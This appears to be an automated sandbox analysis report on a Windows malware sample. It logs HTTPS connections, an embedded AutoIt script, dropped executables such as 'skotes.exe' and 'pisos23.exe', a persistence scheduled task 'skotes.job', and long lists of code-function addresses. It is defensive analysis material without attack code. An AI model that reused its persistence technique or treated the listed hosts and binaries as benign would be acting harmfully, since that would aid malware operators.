Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.5:50237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.69.116.108:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50323 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50379 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50385 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50411 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50410 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50407 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50419 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50452 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50472 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50483 version: TLS 1.2

System Summary

Binary is likely a compiled AutoIt script file

Source: da069a4b00.exe, 00000010.00000002.3079676854.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_ed1a93ab-b
Source: da069a4b00.exe, 00000010.00000002.3079676854.0000000000D82000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_d3c65606-7

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name:
Source: 3e169c0a7e.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name:
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: .rsrc
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name: .idata
Source: 7fb3e2a1d2.exe.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name:
Source: fe40c3a9a8.exe.6.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009078BB	0_2_009078BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00907049	0_2_00907049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00908860	0_2_00908860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009031A8	0_2_009031A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D8101	0_2_009D8101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C4B30	0_2_008C4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C4DE0	0_2_008C4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00902D10	0_2_00902D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090779B	0_2_0090779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F7F36	0_2_008F7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B678BB	2_2_00B678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B68860	2_2_00B68860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B67049	2_2_00B67049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B631A8	2_2_00B631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B24B30	2_2_00B24B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B24DE0	2_2_00B24DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B62D10	2_2_00B62D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B6779B	2_2_00B6779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B57F36	2_2_00B57F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B678BB	3_2_00B678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B68860	3_2_00B68860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B67049	3_2_00B67049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B631A8	3_2_00B631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B24B30	3_2_00B24B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B24DE0	3_2_00B24DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B62D10	3_2_00B62D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B6779B	3_2_00B6779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00B57F36	3_2_00B57F36
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A67070	7_2_00A67070
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6D3E0	7_2_00A6D3E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6DD40	7_2_00A6DD40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7FE10	7_2_00A7FE10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9FF60	7_2_00A9FF60
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A828A0	7_2_00A828A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB10B0	7_2_00AB10B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A86880	7_2_00A86880
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACF880	7_2_00ACF880
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0D080	7_2_00B0D080
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB6890	7_2_00AB6890
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC0890	7_2_00AC0890
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACB890	7_2_00ACB890
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B008F0	7_2_00B008F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A898F0	7_2_00A898F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A848C0	7_2_00A848C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A870C0	7_2_00A870C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A77020	7_2_00A77020
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9B020	7_2_00A9B020
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A90830	7_2_00A90830
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAF830	7_2_00AAF830
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF0030	7_2_00AF0030
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9E000	7_2_00A9E000
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9F000	7_2_00A9F000
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA2000	7_2_00AA2000
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8C810	7_2_00A8C810
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ADA010	7_2_00ADA010
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB1860	7_2_00AB1860
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC0060	7_2_00AC0060
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD0870	7_2_00AD0870
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7B040	7_2_00A7B040
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB0040	7_2_00AB0040
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACD040	7_2_00ACD040
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA6850	7_2_00AA6850
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFF850	7_2_00AFF850
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0A9B0	7_2_00B0A9B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC71A0	7_2_00AC71A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B031A0	7_2_00B031A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB49B0	7_2_00AB49B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACC9B0	7_2_00ACC9B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAA190	7_2_00AAA190
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAF190	7_2_00AAF190
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE6990	7_2_00AE6990
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A961E0	7_2_00A961E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AED1E0	7_2_00AED1E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFD1E0	7_2_00AFD1E0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A661F0	7_2_00A661F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB71F0	7_2_00AB71F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7E1C0	7_2_00A7E1C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD01C0	7_2_00AD01C0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A759D0	7_2_00A759D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A67920	7_2_00A67920
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7B920	7_2_00A7B920
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7C920	7_2_00A7C920
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A85120	7_2_00A85120
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9C920	7_2_00A9C920
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA4120	7_2_00AA4120
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABA120	7_2_00ABA120
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF7120	7_2_00AF7120
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B09120	7_2_00B09120
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A65930	7_2_00A65930
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8B130	7_2_00A8B130
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9F930	7_2_00A9F930
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6F900	7_2_00A6F900
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB9100	7_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD5100	7_2_00AD5100
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A98910	7_2_00A98910
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE4910	7_2_00AE4910
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7E960	7_2_00A7E960
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA3960	7_2_00AA3960
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B22160	7_2_00B22160
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B14152	7_2_00B14152
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9A140	7_2_00A9A140
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6C950	7_2_00A6C950
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD6150	7_2_00AD6150
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACC2A0	7_2_00ACC2A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC92A0	7_2_00AC92A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6C2B0	7_2_00A6C2B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A942B0	7_2_00A942B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A952B0	7_2_00A952B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB9AB0	7_2_00AB9AB0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE82B0	7_2_00AE82B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7F280	7_2_00A7F280
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAAA80	7_2_00AAAA80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD6A80	7_2_00AD6A80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD2280	7_2_00AD2280
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AF9A80	7_2_00AF9A80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B00280	7_2_00B00280
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A70A90	7_2_00A70A90
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A83A90	7_2_00A83A90
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA1A90	7_2_00AA1A90
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AD9A90	7_2_00AD9A90
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A752F0	7_2_00A752F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A87AF0	7_2_00A87AF0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A882F0	7_2_00A882F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A9B2F0	7_2_00A9B2F0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B0B2D0	7_2_00B0B2D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFEAC0	7_2_00AFEAC0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA02D0	7_2_00AA02D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AB32D0	7_2_00AB32D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE12D0	7_2_00AE12D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE02D0	7_2_00AE02D0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A93220	7_2_00A93220
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AA0A30	7_2_00AA0A30
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ADB210	7_2_00ADB210
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AEEA10	7_2_00AEEA10
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A80260	7_2_00A80260
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AC0270	7_2_00AC0270
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A7C240	7_2_00A7C240
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ABCA40	7_2_00ABCA40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00ACEA40	7_2_00ACEA40
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A6AA50	7_2_00A6AA50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A82250	7_2_00A82250
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A80A50	7_2_00A80A50
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B053A0	7_2_00B053A0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A863B0	7_2_00A863B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AE53B0	7_2_00AE53B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AFD3B0	7_2_00AFD3B0
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00A8AB80	7_2_00A8AB80
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00AAEB80	7_2_00AAEB80
